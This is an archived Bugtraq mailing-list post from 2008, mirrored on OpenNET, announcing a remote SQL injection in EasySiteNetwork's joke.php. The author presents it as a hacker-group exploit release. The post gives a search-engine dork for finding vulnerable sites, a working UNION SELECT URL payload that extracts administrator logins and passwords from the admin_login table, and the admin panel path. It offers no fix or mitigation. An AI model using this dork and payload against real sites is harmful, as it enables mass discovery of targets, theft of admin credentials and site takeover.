The OpenNET Project
 
Search (keywords):  SOFT ARTICLES TIPS & TRICKS SECURITY
LINKS NEWS MAN DOCUMENTATION


EasySiteNetwork (joke.php?id) Remote SQL injection Vulnerability


<< Previous INDEX Search src / Print Next >>
Date: Wed, 17 Dec 2008 23:22:35 -0700
From: Ehsan_Hp200@Hotmail.com
To: bugtraq@securityfocus.com
Subject: EasySiteNetwork (joke.php?id) Remote SQL injection Vulnerability
X-Virus-Scanned: antivirus-gw at tyumen.ru

 ###############################  IRANIN THE BEST HACKERS IN THE WORLD ##################
#################### ####################
##
## Remote SQL injection Vulnerability
##
##  EasySiteNetwork (joke.php?id)
##                            
###############################################################
###############################################################
###############################################################
###############################################################
##
## AuTh0r : Ehsan_hp200
##
## H0ME   : www.only-4dl.tk
##
## Email  : Ehsan_Hp200@Hotmail.com
##      
## VENDOR: http://www.easysitenetwork.com/
##
## Persian Gulf 4 Ever!
#############################
#############################
#############################
#############################
##
##

Dork :  inurl:joke.php?id= "Powered by EasySiteNetwork"


 Exploite:

 www.victim.com/joke.php?id=-1992+union+select+1,concat(login,0x3a,password),3,4,5,6,7,8+from+admin_login--


###############################################################################
Admin Panel: www.victim.com/siteadmin

,##############################################################################
Special tanks to : All Parsi Hacker security Team members,SAHAND SHABAN , Dj7xpl , The.Mo3tafa , Jasoos Team ,Enigma2
,#######################################################################################################                                                        
 ###############################  IRANIN THE BEST HACKERS IN THE WORLD ##################


<< Previous INDEX Search src / Print Next >>

ПОДПИШИСЬ НА ЖУРНАЛ Linux Format 2012!

Журнал "Linux Format" (Линукс Формат)- Единственный в России и странах СНГ журнал на русском языке, посвящённый Linux и свободному ПО. Журнал для IT-директоров, IT-менеджеров, программистов, системных администраторов, учителей школ и преподавателей ВУЗов и всех пользователей ПК. В каждом выпуске: Новости индустрии OpenSource, обзоры новинок свободного ПО, обучающие и методические статьи.

Каждый, кто оформит подписку, получает бонусы и подарки- объёмные наклейки на системный блок, диск с архивом номеров за 2005-2011 г.г. и ежемесячно электронную версию журнала в pdf-формате.

Оформить подписку на год


  Закладки на сайте
  Проследить за страницей
Created 1996-2012 by Maxim Chirkov  
ДобавитьРекламаВебмастеруГИД  
RUNNet TopList